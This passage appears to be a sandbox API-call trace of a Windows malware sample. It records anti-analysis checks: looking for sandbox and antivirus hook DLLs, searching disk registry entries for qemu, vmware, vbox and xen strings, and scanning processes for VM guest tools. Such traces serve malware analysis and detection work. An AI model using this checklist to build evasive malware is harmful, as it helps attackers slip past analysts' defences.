dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1b50000 [0084.778] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd58, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe")) returned 0x45 [0084.779] wcsstr (_Str="C:\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe", _SubStr="7869.vmt") returned 0x0 [0084.779] NtQuerySystemInformation (in: SystemInformationClass=0x67, SystemInformation=0x18ff54, Length=0x8, ResultLength=0x0 | out: SystemInformation=0x18ff54, ResultLength=0x0) returned 0x0 [0084.779] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x18ff5c, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18ff5c, ReturnLength=0x0) returned 0x0 [0084.779] GetModuleHandleA (lpModuleName="sbiedll") returned 0x0 [0084.779] GetModuleHandleA (lpModuleName="aswhook") returned 0x0 [0084.780] GetModuleHandleA (lpModuleName="snxhk") returned 0x0 [0084.780] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x294860 [0084.780] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" [0084.780] RtlInitUnicodeString (in: DestinationString=0x18ff28, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") [0084.780] NtOpenKey (in: KeyHandle=0x18ff48, DesiredAccess=0x9, ObjectAttributes=0x18ff30*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x18ff48*=0x80) returned 0x0 [0084.780] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0084.780] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x294970 [0084.780] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x294970, Length=0x2c, ResultLength=0x18ff50 | out: KeyInformation=0x294970, ResultLength=0x18ff50) returned 0x0 [0084.780] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0084.780] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x2949a8 [0084.780] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x2949a8, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x2949a8, ResultLength=0x18ff50) returned 0x0 [0084.783] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="qemu") returned 0x0 [0084.783] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="virtio") returned 0x0 [0084.783] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="vmware") returned 0x0 [0084.783] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="vbox") returned 0x0 [0084.783] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="xen") returned 0x0 [0084.783] LocalFree (hMem=0x2949a8) returned 0x0 [0084.783] NtEnumerateKey (in: KeyHandle=0x80, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0084.784] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x2949a8 [0084.784] NtEnumerateKey (in: KeyHandle=0x80, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x2949a8, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x2949a8, ResultLength=0x18ff50) returned 0x0 [0084.785] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="qemu") returned 0x0 [0084.785] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="virtio") returned 0x0 [0084.785] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="vmware") returned 0x0 [0084.785] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="vbox") returned 0x0 [0084.785] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="xen") returned 0x0 [0084.785] LocalFree (hMem=0x2949a8) returned 0x0 [0084.785] NtEnumerateKey (in: KeyHandle=0x80, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0084.786] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x2949a8 [0084.786] NtEnumerateKey (in: KeyHandle=0x80, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x2949a8, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x2949a8, ResultLength=0x18ff50) returned 0x0 [0084.787] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="qemu") returned 0x0 [0084.787] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="virtio") returned 0x0 [0084.787] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="vmware") returned 0x0 [0084.787] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="vbox") returned 0x0 [0084.787] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="xen") returned 0x0 [0084.787] LocalFree (hMem=0x2949a8) returned 0x0 [0084.787] NtEnumerateKey (in: KeyHandle=0x80, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0084.788] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x2949a8 [0084.788] NtEnumerateKey (in: KeyHandle=0x80, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x2949a8, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x2949a8, ResultLength=0x18ff50) returned 0x0 [0084.789] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="qemu") returned 0x0 [0084.789] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="virtio") returned 0x0 [0084.789] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="vmware") returned 0x0 [0084.789] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="vbox") returned 0x0 [0084.789] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="xen") returned 0x0 [0084.790] LocalFree (hMem=0x2949a8) returned 0x0 [0084.790] NtEnumerateKey (in: KeyHandle=0x80, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0084.790] LocalAlloc (uFlags=0x40, uBytes=0x7a) returned 0x2949a8 [0084.790] NtEnumerateKey (in: KeyHandle=0x80, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x2949a8, Length=0x7a, ResultLength=0x18ff50 | out: KeyInformation=0x2949a8, ResultLength=0x18ff50) returned 0x0 [0084.791] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="qemu") returned 0x0 [0084.791] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="virtio") returned 0x0 [0084.791] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="vmware") returned 0x0 [0084.791] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="vbox") returned 0x0 [0084.792] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="xen") returned 0x0 [0084.792] LocalFree (hMem=0x2949a8) returned 0x0 [0084.792] LocalFree (hMem=0x294970) returned 0x0 [0084.792] NtClose (Handle=0x80) returned 0x0 [0084.793] LocalFree (hMem=0x294860) returned 0x0 [0084.793] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x294860 [0084.793] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" [0084.793] RtlInitUnicodeString (in: DestinationString=0x18ff28, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") [0084.793] NtOpenKey (in: KeyHandle=0x18ff48, DesiredAccess=0x9, ObjectAttributes=0x18ff30*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x18ff48*=0x80) returned 0x0 [0084.793] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0084.793] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x294970 [0084.793] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x294970, Length=0x2c, ResultLength=0x18ff50 | out: KeyInformation=0x294970, ResultLength=0x18ff50) returned 0x0 [0084.793] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0084.793] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x2949a8 [0084.793] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x2949a8, Length=0x50, ResultLength=0x18ff50 | out: KeyInformation=0x2949a8, ResultLength=0x18ff50) returned 0x0 [0084.793] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="qemu") returned 0x0 [0084.793] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="virtio") returned 0x0 [0084.793] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="vmware") returned 0x0 [0084.793] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="vbox") returned 0x0 [0084.794] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="xen") returned 0x0 [0084.794] LocalFree (hMem=0x2949a8) returned 0x0 [0084.794] LocalFree (hMem=0x294970) returned 0x0 [0084.794] NtClose (Handle=0x80) returned 0x0 [0084.794] LocalFree (hMem=0x294860) returned 0x0 [0084.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x18ff5c | out: SystemInformation=0x0, ResultLength=0x18ff5c*=0x12308) returned 0xc0000004 [0084.795] LocalAlloc (uFlags=0x40, uBytes=0x13308) returned 0x294aa8 [0084.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x294aa8, Length=0x13308, ResultLength=0x18ff5c | out: SystemInformation=0x294aa8, ResultLength=0x18ff5c*=0xe350) returned 0x0 [0084.822] wcsstr (_Str="system", _SubStr="qemu-ga.exe") returned 0x0 [0084.822] wcsstr (_Str="system", _SubStr="qga.exe") returned 0x0 [0084.823] wcsstr (_Str="system", _SubStr="windanr.exe") returned 0x0 [0084.823] wcsstr (_Str="system", _SubStr="vboxservice.exe") returned 0x0 [0084.823] wcsstr (_Str="system", _SubStr="vboxtray.exe") returned 0x0 [0084.823] wcsstr (_Str="system", _SubStr="vmtoolsd.exe") returned 0x0 [0084.823] wcsstr (_Str="system", _SubStr="prl_tools.exe") returned 0x0 [0084.823] wcsstr (_Str="smss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.823] wcsstr (_Str="smss.exe", _SubStr="qga.exe") returned 0x0 [0084.823] wcsstr (_Str="smss.exe", _SubStr="windanr.exe") returned 0x0 [0084.823] wcsstr (_Str="smss.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.823] wcsstr (_Str="smss.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.823] wcsstr (_Str="smss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.823] wcsstr (_Str="smss.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.823] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.823] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0084.823] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0084.823] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.823] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.823] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.823] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.823] wcsstr (_Str="wininit.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.823] wcsstr (_Str="wininit.exe", _SubStr="qga.exe") returned 0x0 [0084.823] wcsstr (_Str="wininit.exe", _SubStr="windanr.exe") returned 0x0 [0084.823] wcsstr (_Str="wininit.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.823] wcsstr (_Str="wininit.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.823] wcsstr (_Str="wininit.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.823] wcsstr (_Str="wininit.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.823] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.824] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0084.824] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0084.824] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.824] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.824] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.824] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.824] wcsstr (_Str="winlogon.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.824] wcsstr (_Str="winlogon.exe", _SubStr="qga.exe") returned 0x0 [0084.824] wcsstr (_Str="winlogon.exe", _SubStr="windanr.exe") returned 0x0 [0084.824] wcsstr (_Str="winlogon.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.824] wcsstr (_Str="winlogon.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.824] wcsstr (_Str="winlogon.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.824] wcsstr (_Str="winlogon.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.824] wcsstr (_Str="services.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.824] wcsstr (_Str="services.exe", _SubStr="qga.exe") returned 0x0 [0084.824] wcsstr (_Str="services.exe", _SubStr="windanr.exe") returned 0x0 [0084.824] wcsstr (_Str="services.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.824] wcsstr (_Str="services.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.824] wcsstr (_Str="services.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.824] wcsstr (_Str="services.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.824] wcsstr (_Str="lsass.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.824] wcsstr (_Str="lsass.exe", _SubStr="qga.exe") returned 0x0 [0084.824] wcsstr (_Str="lsass.exe", _SubStr="windanr.exe") returned 0x0 [0084.824] wcsstr (_Str="lsass.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.824] wcsstr (_Str="lsass.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.824] wcsstr (_Str="lsass.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.824] wcsstr (_Str="lsass.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.825] wcsstr (_Str="lsm.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.825] wcsstr (_Str="lsm.exe", _SubStr="qga.exe") returned 0x0 [0084.825] wcsstr (_Str="lsm.exe", _SubStr="windanr.exe") returned 0x0 [0084.825] wcsstr (_Str="lsm.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.825] wcsstr (_Str="lsm.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.825] wcsstr (_Str="lsm.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.825] wcsstr (_Str="lsm.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.825] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.825] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0084.825] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0084.825] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.825] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.825] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.825] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.825] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.825] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0084.825] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0084.825] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.825] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.825] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0084.826] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.827] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.827] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.827] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.827] wcsstr (_Str="explorer.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.827] wcsstr (_Str="explorer.exe", _SubStr="qga.exe") returned 0x0 [0084.827] wcsstr (_Str="explorer.exe", _SubStr="windanr.exe") returned 0x0 [0084.827] wcsstr (_Str="explorer.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.827] wcsstr (_Str="explorer.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.827] wcsstr (_Str="explorer.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.827] wcsstr (_Str="explorer.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.827] wcsstr (_Str="dwm.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.827] wcsstr (_Str="dwm.exe", _SubStr="qga.exe") returned 0x0 [0084.827] wcsstr (_Str="dwm.exe", _SubStr="windanr.exe") returned 0x0 [0084.827] wcsstr (_Str="dwm.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.827] wcsstr (_Str="dwm.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.827] wcsstr (_Str="dwm.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.827] wcsstr (_Str="dwm.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.827] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.827] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0084.827] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0084.827] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.827] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.827] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.827] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.827] wcsstr (_Str="spoolsv.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.827] wcsstr (_Str="spoolsv.exe", _SubStr="qga.exe") returned 0x0 [0084.828] wcsstr (_Str="spoolsv.exe", _SubStr="windanr.exe") returned 0x0 [0084.828] wcsstr (_Str="spoolsv.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.828] wcsstr (_Str="spoolsv.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.828] wcsstr (_Str="spoolsv.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.828] wcsstr (_Str="spoolsv.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.828] wcsstr (_Str="taskhost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.828] wcsstr (_Str="taskhost.exe", _SubStr="qga.exe") returned 0x0 [0084.828] wcsstr (_Str="taskhost.exe", _SubStr="windanr.exe") returned 0x0 [0084.828] wcsstr (_Str="taskhost.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.828] wcsstr (_Str="taskhost.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.828] wcsstr (_Str="taskhost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.828] wcsstr (_Str="taskhost.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.828] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.828] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0084.828] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0084.828] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.828] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.828] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.828] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.828] wcsstr (_Str="officeclicktorun.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.828] wcsstr (_Str="officeclicktorun.exe", _SubStr="qga.exe") returned 0x0 [0084.828] wcsstr (_Str="officeclicktorun.exe", _SubStr="windanr.exe") returned 0x0 [0084.836] wcsstr (_Str="officeclicktorun.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.836] wcsstr (_Str="officeclicktorun.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.836] wcsstr (_Str="officeclicktorun.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.836] wcsstr (_Str="officeclicktorun.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.836] wcsstr (_Str="taskhost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.836] wcsstr (_Str="taskhost.exe", _SubStr="qga.exe") returned 0x0 [0084.836] wcsstr (_Str="taskhost.exe", _SubStr="windanr.exe") returned 0x0 [0084.836] wcsstr (_Str="taskhost.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.836] wcsstr (_Str="taskhost.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.837] wcsstr (_Str="taskhost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.837] wcsstr (_Str="taskhost.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.837] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.837] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0084.837] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0084.837] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.837] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.837] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.837] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.837] wcsstr (_Str="wmiprvse.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.837] wcsstr (_Str="wmiprvse.exe", _SubStr="qga.exe") returned 0x0 [0084.837] wcsstr (_Str="wmiprvse.exe", _SubStr="windanr.exe") returned 0x0 [0084.837] wcsstr (_Str="wmiprvse.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.837] wcsstr (_Str="wmiprvse.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.837] wcsstr (_Str="wmiprvse.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.837] wcsstr (_Str="wmiprvse.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.837] wcsstr (_Str="iexplore.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.837] wcsstr (_Str="iexplore.exe", _SubStr="qga.exe") returned 0x0 [0084.837] wcsstr (_Str="iexplore.exe", _SubStr="windanr.exe") returned 0x0 [0084.837] wcsstr (_Str="iexplore.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.837] wcsstr (_Str="iexplore.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.837] wcsstr (_Str="iexplore.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.837] wcsstr (_Str="iexplore.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.837] wcsstr (_Str="sppsvc.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.837] wcsstr (_Str="sppsvc.exe", _SubStr="qga.exe") returned 0x0 [0084.837] wcsstr (_Str="sppsvc.exe", _SubStr="windanr.exe") returned 0x0 [0084.838] wcsstr (_Str="sppsvc.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.838] wcsstr (_Str="sppsvc.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.838] wcsstr (_Str="sppsvc.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.838] wcsstr (_Str="sppsvc.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.838] wcsstr (_Str="iexplore.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.838] wcsstr (_Str="iexplore.exe", _SubStr="qga.exe") returned 0x0 [0084.838] wcsstr (_Str="iexplore.exe", _SubStr="windanr.exe") returned 0x0 [0084.838] wcsstr (_Str="iexplore.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.838] wcsstr (_Str="iexplore.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.838] wcsstr (_Str="iexplore.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.838] wcsstr (_Str="iexplore.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.838] wcsstr (_Str="rule_night.exe", 